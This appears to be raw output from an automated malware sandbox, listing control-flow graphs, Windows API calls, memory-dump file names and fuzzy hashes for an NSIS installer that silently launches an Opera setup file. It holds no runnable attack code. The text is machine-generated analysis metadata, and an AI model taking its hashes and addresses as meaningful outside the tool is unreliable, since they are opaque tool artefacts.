                                                                                                                                                                            control_flow_graph 434 40349e-4034c6 GetTickCount 435 4035f6-4035fe call 403053 434->435 436 4034cc-4034f7 call 40361d SetFilePointer 434->436 441 403600-403604 435->441 442 4034fc-40350e 436->442 443 403510 442->443 444 403512-403520 call 403607 442->444 443->444 447 403526-403532 444->447 448 4035e8-4035eb 444->448 449 403538-40353e 447->449 448->441 450 403540-403546 449->450 451 403569-403585 call 406c11 449->451 450->451 452 403548-403568 call 403053 450->452 457 4035f1 451->457 458 403587-40358f 451->458 452->451 459 4035f3-4035f4 457->459 460 403591-403599 call 406244 458->460 461 4035b2-4035b8 458->461 459->441 465 40359e-4035a0 460->465 461->457 462 4035ba-4035bc 461->462 462->457 464 4035be-4035d1 462->464 464->442 468 4035d7-4035e6 SetFilePointer 464->468 466 4035a2-4035ae 465->466 467 4035ed-4035ef 465->467 466->449 469 4035b0 466->469 467->459 468->435 469->464
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004034B2
                                                                                                                                                                              • Part of subcall function 0040361D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                                                                                                                                            • SetFilePointer.KERNEL32(00045AA4,00000000,00000000,004266F0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer$CountTick
                                                                                                                                                                            • String ID: hA
                                                                                                                                                                            • API String ID: 1092082344-2144240161
                                                                                                                                                                            • Opcode ID: e11cf52a2002a60f9caf7e4f5257b2a9e139536fe8b899a245e26a0cd04ca586
                                                                                                                                                                            • Instruction ID: a6cc621958e3896f8f0562ac50284c64eb2e0996e34cc3673b0accbb5e92da07
                                                                                                                                                                            • Opcode Fuzzy Hash: e11cf52a2002a60f9caf7e4f5257b2a9e139536fe8b899a245e26a0cd04ca586
                                                                                                                                                                            • Instruction Fuzzy Hash: C231D076504201EFDB209F6AFE419663FACF720356B85823FF901A22F0CB749901AB1D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 554 406079-406094 call 4066a2 call 40601c 559 406096-406098 554->559 560 40609a-4060a7 call 406950 554->560 561 4060f2-4060f4 559->561 564 4060b7-4060bb 560->564 565 4060a9-4060af 560->565 567 4060d1-4060da lstrlenW 564->567 565->559 566 4060b1-4060b5 565->566 566->559 566->564 568 4060dc-4060f0 call 405f71 GetFileAttributesW 567->568 569 4060bd-4060c4 call 4069ff 567->569 568->561 574 4060c6-4060c9 569->574 575 4060cb-4060cc call 405fbd 569->575 574->559 574->575 575->567
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 0040602A
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                                                            • lstrlenW.KERNEL32(00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 004060D2
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00456750,00456750,00456750,00456750,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 004060E2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                            • String ID: PgE
                                                                                                                                                                            • API String ID: 3248276644-3220684765

                                                                                                                                                                            Control-flow Graph
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004061DF
                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403663,004CD000,004D1000,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F), ref: 004061FA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                            • API String ID: 1716503409-2209301699

                                                                                                                                                                            Control-flow Graph
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:

                                                                                                                                                                            Control-flow Graph
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:

                                                                                                                                                                            Control-flow Graph
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 738 406c11-406c34 739 406c36-406c39 738->739 740 406c3e-406c41 738->740 741 40765e-407662 739->741 742 406c44-406c4d 740->742 743 406c53 742->743 744 40765b 742->744 745 406c5a-406c5e 743->745 746 406d9a-407441 743->746 747 406cff-406d03 743->747 748 406d6f-406d73 743->748 744->741 749 406c64-406c71 745->749 750 407646-407659 745->750 759 407443-407459 746->759 760 40745b-407471 746->760 754 406d09-406d22 747->754 755 4075af-4075b9 747->755 751 406d79-406d8d 748->751 752 4075be-4075c8 748->752 749->744 757 406c77-406cbd 749->757 750->741 758 406d90-406d98 751->758 752->750 756 406d25-406d29 754->756 755->750 756->747 761 406d2b-406d31 756->761 762 406ce5-406ce7 757->762 763 406cbf-406cc3 757->763 758->746 758->748 764 407474-40747b 759->764 760->764 767 406d33-406d3a 761->767 768 406d5b-406d6d 761->768 771 406cf5-406cfd 762->771 772 406ce9-406cf3 762->772 769 406cc5-406cc8 GlobalFree 763->769 770 406cce-406cdc GlobalAlloc 763->770 765 4074a2-4074ae 764->765 766 40747d-407481 764->766 765->742 773 407630-40763a 766->773 774 407487-40749f 766->774 776 406d45-406d55 GlobalAlloc 767->776 777 406d3c-406d3f GlobalFree 767->777 768->758 769->770 770->744 778 406ce2 770->778 771->756 772->771 772->772 773->750 774->765 776->744 776->768 777->776 778->762
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
• Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
• Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
• Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45

Control-flow Graph (basic-block edges; legend: Executed / Not Executed)

control_flow_graph 779 40705f-407063 780 407081-4070c4 779->780 781 407065-40707c 779->781 782 40742c-407441 780->782 781->782 783 407443-407459 782->783 784 40745b-407471 782->784 785 407474-40747b 783->785 784->785 786 4074a2-4074ae 785->786 787 40747d-407481 785->787 793 406c53 786->793 794 40765b 786->794 788 407630-40763a 787->788 789 407487-40749f 787->789 792 407646-407659 788->792 789->786 795 40765e-407662 792->795 796 406c5a-406c5e 793->796 797 406d9a-406dbb 793->797 798 406cff-406d03 793->798 799 406d6f-406d73 793->799 794->795 796->792 800 406c64-406c71 796->800 797->782 803 406d09-406d22 798->803 804 4075af-4075b9 798->804 801 406d79-406d8d 799->801 802 4075be-4075c8 799->802 800->794 806 406c77-406cbd 800->806 807 406d90-406d98 801->807 802->792 805 406d25-406d29 803->805 804->792 805->798 808 406d2b-406d31 805->808 809 406ce5-406ce7 806->809 810 406cbf-406cc3 806->810 807->797 807->799 811 406d33-406d3a 808->811 812 406d5b-406d6d 808->812 815 406cf5-406cfd 809->815 816 406ce9-406cf3 809->816 813 406cc5-406cc8 GlobalFree 810->813 814 406cce-406cdc GlobalAlloc 810->814 817 406d45-406d55 GlobalAlloc 811->817 818 406d3c-406d3f GlobalFree 811->818 812->807 813->814 814->794 819 406ce2 814->819 815->805 816->815 816->816 817->794 817->812 818->817 819->809
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
• Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
• Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
• Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
• Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
• Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
• Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
• Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
• Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
• Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
APIs
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402128
  • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
  • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
  • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
  • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
  • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
• FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
• Opcode ID: bd5665d3c642ef3073feb2242ea4fac62aded45c66893f7ea3efa05918624785
• Instruction ID: ce338c56279ea8fe8b79aec8352296299df23ba62fb37657eb23f857ac8d175a
• Opcode Fuzzy Hash: bd5665d3c642ef3073feb2242ea4fac62aded45c66893f7ea3efa05918624785
• Instruction Fuzzy Hash: 9721D431900104EADF10AFA5CF89A9E7A71BF54355F30413BF501B91E5CBBD89829A2E
APIs
• GlobalFree.KERNELBASE(00861CF8), ref: 00401C30
• GlobalAlloc.KERNEL32(00000040,00004004), ref: 00401C42
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree
                                                                                                                                                                            • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                                                            • API String ID: 3394109436-3663954162
                                                                                                                                                                            • Opcode ID: 5a5a1ee5ed13d0feaabbf874524b486d37df7d8f4895048c82ffb873ba65e8fb
                                                                                                                                                                            • Instruction ID: 411326a6bd5adc799c7b4966fae4248b5e735fb78bdcb674ef76145c70810545
                                                                                                                                                                            • Opcode Fuzzy Hash: 5a5a1ee5ed13d0feaabbf874524b486d37df7d8f4895048c82ffb873ba65e8fb
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D210572A04150ABEB20EFA5DD9599E73A8AF14314714483FFA52F36D0C67C9C908B1D
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040616D: GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                                              • Part of subcall function 0040616D: SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D81
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D89
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1655745494-0
                                                                                                                                                                            • Opcode ID: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                                                            • Instruction ID: 230036c29a26c5c6c0f0d9698206584c8b05a9663c1b6bdb31d330f7893cafd1
                                                                                                                                                                            • Opcode Fuzzy Hash: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                                                            • Instruction Fuzzy Hash: A6E065312156915AC35057759E0CA6B2A98DFC6724F15893BF892F11D0CB7C884A8A6D
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: 8ae365655b7597d869b3b2f56841766425f6863b3c44559cbc89e4a26d302e34
                                                                                                                                                                            • Instruction ID: 1ca1e87bffa477aecce4b8809d13608721b46e5c52e0656af2305a29f618206d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ae365655b7597d869b3b2f56841766425f6863b3c44559cbc89e4a26d302e34
                                                                                                                                                                            • Instruction Fuzzy Hash: E9317F30504219BBDB12DF55EE85A9E3FA8EB00359F10443BF905FA190D2788A509BA9
                                                                                                                                                                            APIs
